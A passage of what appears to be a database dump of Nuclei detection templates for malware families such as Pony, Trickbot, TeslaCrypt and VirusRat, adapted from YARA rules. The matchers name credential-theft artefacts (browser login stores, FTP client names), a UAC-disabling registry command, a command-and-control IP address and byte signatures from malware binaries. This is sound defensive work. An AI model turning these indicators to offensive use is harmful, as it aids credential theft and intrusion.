\"frown.py\"\n - \"backer.py\"\n - \"smile.py\"\n - \"affine.py\"\n - \"cmd\"\n - \".exe\"\n condition: and\n\n - type: regex\n regex:\n - '(\\.py$|\\.pyc$|\\.pyd$|Python)'\n - '\\.dll'\n condition: and\n\n# digest: 4b0a00483046022100e09de2e10a3630983f1b2249a132629deeece25a89ffbf24c61a86058313df150221009fed290461f94ccf057c69f612a3356f50ea91833fc67e7666e1d3e22133abf0:922c64590222798bb761d5b6d8e72950\n", "hash": "949ca2e7afea0340c1c97aa9c1167a0f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc2" }, "name": "pony-malware.yaml", "content": "id: pony-malware\n\ninfo:\n name: Pony Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Pony.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}\"\n - \"YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0\"\n - \"POST %s HTTP/1.0\"\n - \"Accept-Encoding: identity, *;q=0\"\n condition: and\n\n# digest: 4b0a00483046022100d1488f9b654f6e62deb05f5d8aff7165d3f6bab59d11f4e9ea5753f549b4edf6022100f8b660933458693e2ff78b7f6f74e225837fb47e6dd535acb6946e7ef617c4e4:922c64590222798bb761d5b6d8e72950\n", "hash": "fe9afcbdba0a357ec4d6ec60fc0d5a87", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc3" }, "name": "pony-stealer-malware.yaml", "content": "id: pony-stealer-malware\n\ninfo:\n name: Windows Pony Stealer Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_pony_stealer.yara\n tags: malware,file,pony,stealer\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"signons.sqlite\"\n - \"signons.txt\"\n - \"signons2.txt\"\n - \"signons3.txt\"\n - \"WininetCacheCredentials\"\n - \"moz_logins\"\n - \"encryptedPassword\"\n - \"FlashFXP\"\n - \"BulletProof\"\n - \"CuteFTP\"\n condition: and\n case-insensitive: true\n\n# digest: 4a0a00473045022051137ec4287733be40855295f4df9e5a0c89085ddbc6af52449fd86bb78eeef9022100d0280cb88ff244d8e3753e6f5e9bf2ed1fd723610d42781b02c530800a711e38:922c64590222798bb761d5b6d8e72950\n", "hash": "66a9f44760861a91bf3cd474b79267a2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc4" }, "name": "powerware-malware.yaml", "content": "id: powerware-malware\n\ninfo:\n name: PowerWare Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara\n tags: malware,file,powerware\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ScriptRunner.dll\"\n - \"ScriptRunner.pdb\"\n - \"fixed.ps1\"\n condition: and\n\n# digest: 4a0a0047304502202f84f482f615237f07e7c108cd61c226f08b6b515c6736d3e88fb43de8e7c025022100bcd4078138a73ac29b4c59b0b58365b09396c0db1a124c04fc08d86788f1e52a:922c64590222798bb761d5b6d8e72950\n", "hash": "dd12c9d31197138ba123d07625589242", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc5" }, "name": "pubsab-malware.yaml", "content": "id: pubsab-malware\n\ninfo:\n name: PubSab Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PubSab.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"_deamon_init\"\n - \"com.apple.PubSabAgent\"\n - \"/tmp/screen.jpeg\"\n condition: or\n\n - type: binary\n binary:\n - \"6B45E43789CA29C28955E4\"\n\n# digest: 4b0a00483046022100e35038a4704449057d8c527208921acaf54a002d1f882572781ee2d32875aa29022100bbafab64c56d8a6a650628069a2ca792f78859923ff371f0ad3f0c18fd3d1215:922c64590222798bb761d5b6d8e72950\n", "hash": "ad6d3c2132fa8dbc36fb8388446a4ad9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc6" }, "name": "punisher-malware.yaml", "content": "id: punisher-malware\n\ninfo:\n name: Punisher Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"abccba\"\n - \"SpyTheSpy\"\n - \"wireshark\"\n - \"apateDNS\"\n - \"abccbaDanabccb\"\n condition: and\n\n - type: binary\n binary:\n - \"5C006800660068002E007600620073\"\n - \"5C00730063002E007600620073\"\n condition: and\n\n# digest: 4a0a004730450220680377c6a6c5163e263077764a7ef6300edd75e57a09766f330f652bd1a4a0110221008675d1a4b089ae3b37454d41799ea67eefcadee002720a2e2e561d2eab289adf:922c64590222798bb761d5b6d8e72950\n", "hash": "0b5692c79910aca69cf9bef91f991d0e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc7" }, "name": "pypi-malware.yaml", "content": "id: pypi-malware\n\ninfo:\n name: Fake PyPI Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - http://www.nbu.gov.sk/skcsirt-sa-20170909-pypi/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_PyPI.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"# Welcome Here! :)\"\n - \"# just toy, no harm :)\"\n - \"[0x76,0x21,0xfe,0xcc,0xee]\"\n condition: and\n\n# digest: 490a0046304402206b82fc613c832c971dacca4ebef281e7665c9f1f006f44a24c48296dae1a9b8c02206f9aea9c19d940aac173806aa1726900fb0fd68078dc61ab6496191f35d52fa5:922c64590222798bb761d5b6d8e72950\n", "hash": "ecc15726080832acf2ca80d3ef888d82", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc8" }, "name": "pythorat-malware.yaml", "content": "id: pythorat-malware\n\ninfo:\n name: PythoRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"TKeylogger\"\n - \"uFileTransfer\"\n - \"TTDownload\"\n - \"SETTINGS\"\n - \"Unknown\"\n - \"#@#@#\"\n - \"PluginData\"\n - \"OnPluginMessage\"\n condition: and\n\n# digest: 4b0a004830460221009093ec1809d86d670fb071055cb0fddd67efae877cc74470a43365766d82b6a902210092ffcc0109b2a0d3d3133d1b1856cfb208b8dc90f531a363d9ddd4d527bdc72c:922c64590222798bb761d5b6d8e72950\n", "hash": "d910e35192e805e5aebb2c3e3a1ea5ac", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dc9" }, "name": "qrat-malware.yaml", "content": "id: qrat-malware\n\ninfo:\n name: QRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"quaverse/crypter\"\n - \"Qrypt.class\"\n - \"Jarizer.class\"\n - \"URLConnection.class\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"e-data\"\n - \"Qrypt.class\"\n - \"Jarizer.class\"\n - \"URLConnection.class\"\n condition: and\n\n - type: word\n words:\n - \"e-data\"\n - \"quaverse/crypter\"\n - \"Jarizer.class\"\n - \"URLConnection.class\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"e-data\"\n - \"quaverse/crypter\"\n - \"Qrypt.class\"\n - \"URLConnection.class\"\n condition: and\n\n# digest: 4b0a00483046022100fedf267a13b375a9f38379878ddeb76727feb11d239ac2e0e6c9549acf3dbbde022100bb74b2c94ef235bbd7642ad6c930924f9e6138f3f60c219a7d39018eb62a5dcc:922c64590222798bb761d5b6d8e72950\n", "hash": "2cc6d9d72233083d082bb64b7f7f7e29", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dca" }, "name": "satana-dropper-malware.yaml", "content": "id: satana-dropper-malware\n\ninfo:\n name: Satana Dropper Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Satana.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"25732D547279457863657074\"\n - \"643A5C6C626574776D77795C75696A657571706C667775622E706462\"\n - \"71666E7476746862\"\n condition: and\n\n# digest: 4a0a0047304502205f28aaef12ecdda0670971694f70cf1e8a32caa2f72bc8ff0e7e4ad72ccc82ee02210087f065cda4b2fa25f7b687dc03332a6be7a6bed793f097a1b1507f4e653dc554:922c64590222798bb761d5b6d8e72950\n", "hash": "8f83c7efd283538cdeb3d8743750be1a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcb" }, "name": "satana-malware.yaml", "content": "id: satana-malware\n\ninfo:\n name: Satana Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: binary\n binary:\n - \"210073006100740061006E00610021002E0074007800740000\"\n - \"456E756D4C6F63616C526573\"\n - \"574E65744F70656E456E756D5700\"\n - \"21534154414E4121\"\n condition: and\n\n - type: binary\n binary:\n - \"7467777975677771\"\n - \"537776776E6775\"\n condition: or\n\n# digest: 4a0a00473045022100e0d617ca6bbe36bf2a8bd9c875e1fbf40332d5e385abe1e70cfa19ccbc96056f02203da10e9fd106a91ded24ea8f1a8fa96970b8ea2a902ee57372afa80d486d303a:922c64590222798bb761d5b6d8e72950\n", "hash": "d3659b1acda4bd5a655ee2a42aa7e9b2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcc" }, "name": "shimrat-malware.yaml", "content": "id: shimrat-malware\n\ninfo:\n name: ShimRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \".dll\"\n - \".dat\"\n - \"QWERTYUIOPLKJHG\"\n - \"MNBVCXZLKJHGFDS\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"Data$$00\"\n - \"Data$$01%c%sData\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"ping localhost -n 9 /c %s > nul\"\n - \"Demo\"\n - \"Win32App\"\n - \"COMSPEC\"\n - \"ShimMain\"\n - \"NotifyShims\"\n - \"GetHookAPIs\"\n condition: and\n\n# digest: 4b0a004830460221009da26e19a00937b0d0349977f9fec211af3d556f9f893e2867131c0abd215ddf0221008601cdf41e002a97fba4584ad7e7c4df833a7b6f67cfa3bde6e2f3c5c87af44d:922c64590222798bb761d5b6d8e72950\n", "hash": "8cebf42abeed3a6f9422422855763fd3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcd" }, "name": "shimratreporter-malware.yaml", "content": "id: shimratreporter-malware\n\ninfo:\n name: ShimRatReporter Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Shim.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"IP-INFO\"\n - \"Network-INFO\"\n - \"OS-INFO\"\n - \"Process-INFO\"\n - \"Browser-INFO\"\n - \"QueryUser-INFO\"\n - \"Users-INFO\"\n - \"Software-INFO\"\n - \"%02X-%02X-%02X-%02X-%02X-%02X\"\n - \"(from environment) = %s\"\n - \"NetUserEnum\"\n - \"GetNetworkParams\"\n condition: and\n\n# digest: 4b0a004830460221008a0d2f7db3a9984378cf10f44fa78b4160a493e9e3b8bd7c6ae0ae600b0777cb022100b36b3c25e9b677e7c62fc45315d79df0f7157479630f3e871854cd7557538f54:922c64590222798bb761d5b6d8e72950\n", "hash": "27f6f1c343bd4ef46e9ea53907aba71e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dce" }, "name": "sigma-malware.yaml", "content": "id: sigma-malware\n\ninfo:\n name: Sigma Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Sigma.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \".php?\"\n - \"uid=\"\n - \"&uname=\"\n - \"&os=\"\n - \"&pcname=\"\n - \"&total=\"\n - \"&country=\"\n - \"&network=\"\n - \"&subid=\"\n condition: and\n\n# digest: 4a0a00473045022100923b2707a03e5401842cf8f3978904badc2e191971659a40e69614409a013d1302201e8ae19646d6ba3d6a7ec2c3c227de5b26f3d888fa7d454f5566994cdb44b7a0:922c64590222798bb761d5b6d8e72950\n", "hash": "426bbcbcc3496775ed3e1c7bd300ce1f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dcf" }, "name": "smallnet-malware.yaml", "content": "id: smallnet-malware\n\ninfo:\n name: SmallNet Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"!!<3SAFIA<3!!\"\n - \"!!ElMattadorDz!!\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \"stub_2.Properties\"\n - \"stub.exe\"\n - \"get_CurrentDomain\"\n condition: and\n\n# digest: 4a0a00473045022051a244fc74e16f5e6862e07462f37cf639913cc7ee40223ad0d271197f1d028e022100ace9ba900210c44afc93693c5aeb0b618a2d793d6a2dcd761b5f85d9b5944f57:922c64590222798bb761d5b6d8e72950\n", "hash": "63755ba6f7b6f087351e8e8311750f4e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd0" }, "name": "snake-malware.yaml", "content": "id: snake-malware\n\ninfo:\n name: Snake Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Snake.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"Go build ID: \\\"X6lNEpDhc_qgQl56x4du/fgVJOqLlPCCIekQhFnHL/rkxe6tXCg56Ez88otHrz/Y-lXW-OhiIbzg3-ioGRz\\\"\"\n\n - type: binary\n binary:\n - \"89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF\"\n - \"648B0D140000008B89000000003B61080F863801000083EC3CE8321AF3FF8D7C242889E6E825EAF0FF8B44242C8B4C242889C2C1E81FC1E01F85C00F84FC000000D1E289CBC1E91F09D189DAD1E3C1EB1F89CDD1E109D989CB81C1807FB1D7C1ED1F81C3807FB1D783D50D89C8BB00CA9A3B89D1F7E381E1FFFFFF3F89C301C889C60500001A3D89042469ED00CA9A3B01EA89CDC1F91F01EB11CA81C600001A3D81D2EB03B2A189542404E81062F6FF31C0EB79894424208B4C24408D14C18B1A895C24248B52048954241CC7042405000000E848FEFFFF8B4424088B4C2404C70424000000008B542424895424048B5C241C895C2408894C240C89442410E8ECDDEFFF8B4424188B4C2414894C24088944240C8B4424248904248B44241C89442404E868BBF3FF8B44242040\"\n condition: and\n\n# digest: 4a0a00473045022034639cbc3aaa73d91005d132d39c09dd9f3c358777b4ce9c7eb0d08828404ed90221008ef9c8229ed2c014a5c70a2cfd5e8b5ca671e2bf8f50aad9646dd781650bd82d:922c64590222798bb761d5b6d8e72950\n", "hash": "f02f7297426966ab0e1e94be5b2dd48c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd1" }, "name": "sub7nation-malware.yaml", "content": "id: sub7nation-malware\n\ninfo:\n name: Sub7Nation Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"EnableLUA /t REG_DWORD /d 0 /f\"\n - \"*A01*\"\n - \"*A02*\"\n - \"*A03*\"\n - \"*A04*\"\n - \"*A05*\"\n - \"*A06*\"\n - \"#@#@#\"\n - \"HostSettings\"\n - \"sevane.tmp\"\n - \"cmd_.bat\"\n - \"a2b7c3d7e4\"\n - \"cmd.dll\"\n condition: and\n\n# digest: 4b0a00483046022100fb2764917f165bba45b38510991be14ee4b76e66856cce974eb53ff743f7dd2f022100bb16838b1f79589fb2ee28e8a48a8b56421df874e5bd2d1c2e301bdc7fddb183:922c64590222798bb761d5b6d8e72950\n", "hash": "dd085a718ec51a572645252b41c33cf8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd2" }, "name": "t5000-malware.yaml", "content": "id: t5000-malware\n\ninfo:\n name: T5000 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_T5000.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"_tmpR.vbs\"\n - \"_tmpg.vbs\"\n - \"Dtl.dat\"\n - \"3C6FB3CA-69B1-454f-8B2F-BD157762810E\"\n - \"EED5CA6C-9958-4611-B7A7-1238F2E1B17E\"\n - \"8A8FF8AD-D1DE-4cef-B87C-82627677662E\"\n - \"43EE34A9-9063-4d2c-AACD-F5C62B849089\"\n - \"A8859547-C62D-4e8b-A82D-BE1479C684C9\"\n - \"A59CF429-D0DD-4207-88A1-04090680F714\"\n - \"utd_CE31\"\n - \"f:\\\\Project\\\\T5000\\\\Src\\\\Target\\\\1 KjetDll.pdb\"\n - \"l:\\\\MyProject\\\\Vc 7.1\\\\T5000\\\\T5000Ver1.28\\\\Target\\\\4 CaptureDLL.pdb\"\n - \"f:\\\\Project\\\\T5000\\\\Src\\\\Target\\\\4 CaptureDLL.pdb\"\n - \"E:\\\\VS2010\\\\xPlat2\\\\Release\\\\InstRes32.pdb\"\n condition: or\n\n# digest: 4b0a00483046022100c4d719f89ac4726441df42b1d0068c3cf398983de9ec48ebcc901802ff3a93d402210085f58b14a245c974e033ec00eb4038cb784244a023a72c86ad2d6b764d2d9c6a:922c64590222798bb761d5b6d8e72950\n", "hash": "654a3e02e36540f16611f9ec7f7044af", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd3" }, "name": "tedroo-malware.yaml", "content": "id: tedroo-malware\n\ninfo:\n name: Tedroo Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Tedroo.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"257325732E657865\"\n - \"5F6C6F672E747874\"\n condition: and\n\n# digest: 4b0a00483046022100c0edf2315be868e1c4cd22d05c74bee3a744b620c5b4c30312b6341c77b65e73022100a33de0b6394c6b823a31d816e69467ecd5740b9272d4afb53b8f8a1be5bb4238:922c64590222798bb761d5b6d8e72950\n", "hash": "27b5205a331e3ae1da0a8ac72f67d513", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd4" }, "name": "terminator-malware.yaml", "content": "id: terminator-malware\n\ninfo:\n name: Terminator Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Terminator.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Accelorator\"\n - \"12356\"\n condition: and\n\n# digest: 490a0046304402206fb3e105ea9cabbc826f3dcdd7109ad096bb1916aa0b2413019a80d6cc785650022016d325b3ea18206c6f3bf1e8e1b214c79328a6251572d7d70ae42c1b90e827ee:922c64590222798bb761d5b6d8e72950\n", "hash": "1d125467509ea09156abad4aefd735cd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd5" }, "name": "teslacrypt-malware.yaml", "content": "id: teslacrypt-malware\n\ninfo:\n name: TeslaCrypt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_TeslaCrypt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"4E6F7720697427732025493A254D25702E00000076616C2069732025640A0000\"\n\n# digest: 4a0a00473045022100cc5505ef331e458b96f5b74ed97eab506cedf912eb01039ce9b817fddcc960e502202306bebd061c483b1e14f1edab9a43258e9788023188fb37f96bd8d214088d0d:922c64590222798bb761d5b6d8e72950\n", "hash": "9433f4739bc3cdb4676b9ab1289a69ea", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd6" }, "name": "tox-malware.yaml", "content": "id: tox-malware\n\ninfo:\n name: Tox Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Tox.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<>><<<\"\n condition: and\n\n# digest: 490a004630440220145a23c07dceab65162628617ab1d5f68f98681d263bdd753bbea601d475a39302206cfc0ef865f74a4b2ad37e3b5e0a5a4b6d12eeb49ddcbb2301b47f5d544072f0:922c64590222798bb761d5b6d8e72950\n", "hash": "17bccef4d40034e577e72e228b03ada2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd7" }, "name": "treasurehunt-malware.yaml", "content": "id: treasurehunt-malware\n\ninfo:\n name: Trickbot Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TreasureHunt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"treasureHunter.pdb\"\n - \"jucheck\"\n - \"cmdLineDecrypted\"\n condition: and\n\n# digest: 490a00463044022066ec12589d804e6cdd0ae2549ddb57602345462fd6dee2a09550b9e9a4108068022002ae9874acc7eb50603b2ab47d0c2800183c391cd71b5dbb08f43d95ba4cab26:922c64590222798bb761d5b6d8e72950\n", "hash": "985df2bacf262b172421c082ab44b63c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd8" }, "name": "trickbot-malware.yaml", "content": "id: trickbot-malware\n\ninfo:\n name: Trickbot Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_TrickBot.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"moduleconfig\"\n - \"Start\"\n - \"Control\"\n - \"FreeBuffer\"\n - \"Release\"\n condition: and\n\n# digest: 4a0a004730450220707c3242eb05a2aba17d8a46be0d45921b92677ff74100c7af12a0778cb30dcd022100cb971233ce240fa01df92e4de1552ff5b06cdd9bd1eeeabab7fb7124be816da1:922c64590222798bb761d5b6d8e72950\n", "hash": "e198788980deac0e8400830494bcd459", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dd9" }, "name": "trumpbot-malware.yaml", "content": "id: trumpbot-malware\n\ninfo:\n name: TrumpBot Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Trumpbot.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"trumpisdaddy\"\n - \"198.50.154.188\"\n condition: and\n\n# digest: 490a00463044022077686f6a132d9f6022811b59ada2f6e32dc4c3847f849c6c62578d03d11b0fa002202ed35d1b92c92e2fc792b216642c08c92cc9e1a52032828ce2df303909b75f03:922c64590222798bb761d5b6d8e72950\n", "hash": "98e1bbde096a6e025619775722a9f0ea", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dda" }, "name": "universal-1337-malware.yaml", "content": "id: universal-1337-malware\n\ninfo:\n name: Universal 1337 Stealer Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Stealer.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"2A5B532D502D4C2D492D545D2A\"\n - \"2A5B482D452D522D455D2A\"\n condition: and\n\n - type: binary\n binary:\n - \"4654507E\"\n - \"7E317E317E307E30\"\n condition: and\n\n# digest: 490a004630440220397ce50e31990f7aaaf02be33afd37aff4a51d93c9940d61c39cc589194a78f102207ace42ecf66077fe30a11e59a5701dd4cbc00744153c557a103eed243e082eec:922c64590222798bb761d5b6d8e72950\n", "hash": "b8f5230f73c5e4c86ae94dc5741e5363", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddb" }, "name": "unrecom-malware.yaml", "content": "id: unrecom-malware\n\ninfo:\n name: Unrecom Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"META-INF\"\n - \"load/ID\"\n - \"load/JarMain.class\"\n - \"load/MANIFEST.MF\"\n - \"plugins/UnrecomServer.class\"\n condition: and\n\n# digest: 490a00463044022061c7bc50067c54621333714d9eb670cd63a90b46af0b387b09efe0d4c7c4068b02203c84c06d9f54cbc723c12be9e4c7960f2eca1c6f126492c098d2b2e9a78b7465:922c64590222798bb761d5b6d8e72950\n", "hash": "85aafb35a7467f8cacbb85bb692fdc50", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddc" }, "name": "urausy-malware.yaml", "content": "id: urausy-malware\n\ninfo:\n name: Urausy Skype Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Urausy.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"skype.dat\"\n - \"skype.ini\"\n - \"CreateWindow\"\n - \"YIWEFHIWQ\"\n - \"CreateDesktop\"\n - \"MyDesktop\"\n condition: and\n\n# digest: 4a0a0047304502207b3b598cd852ee0690d9b13cc9b12860694de99a33231362605d694396de456f022100da377937679673c9a06f1a8c9a4b804226d71c2d0e28eae0a7702f0f2dec74cc:922c64590222798bb761d5b6d8e72950\n", "hash": "c2fce7cba211ed135cdbc7edca14b950", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddd" }, "name": "vertex-malware.yaml", "content": "id: vertex-malware\n\ninfo:\n name: Vertex Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"DEFPATH\"\n - \"HKNAME\"\n - \"HPORT\"\n - \"INSTALL\"\n - \"IPATH\"\n - \"MUTEX\"\n - \"PANELPATH\"\n - \"ROOTURL\"\n condition: and\n\n# digest: 4a0a00473045022100cade2b78f128db265e8c5db7004a11d4c7062226687a418ae25d172870f626ec02202aabc9b4786f780667e3863bbe8561528edfd2b957d7ac9b052701e5d5812679:922c64590222798bb761d5b6d8e72950\n", "hash": "682366042b7f31f10aa46bc716be8e26", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dde" }, "name": "virusrat-malware.yaml", "content": "id: virusrat-malware\n\ninfo:\n name: VirusRat Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"virustotal\"\n - \"virusscan\"\n - \"abccba\"\n - \"pronoip\"\n - \"streamWebcam\"\n - \"DOMAIN_PASSWORD\"\n - \"Stub.Form1.resources\"\n - \"ftp://{0}@{1}\"\n - \"SELECT * FROM moz_logins\"\n - \"SELECT * FROM moz_disabledHosts\"\n - \"DynDNS\\\\Updater\\\\config.dyndns\"\n - \"|BawaneH|\"\n condition: and\n\n# digest: 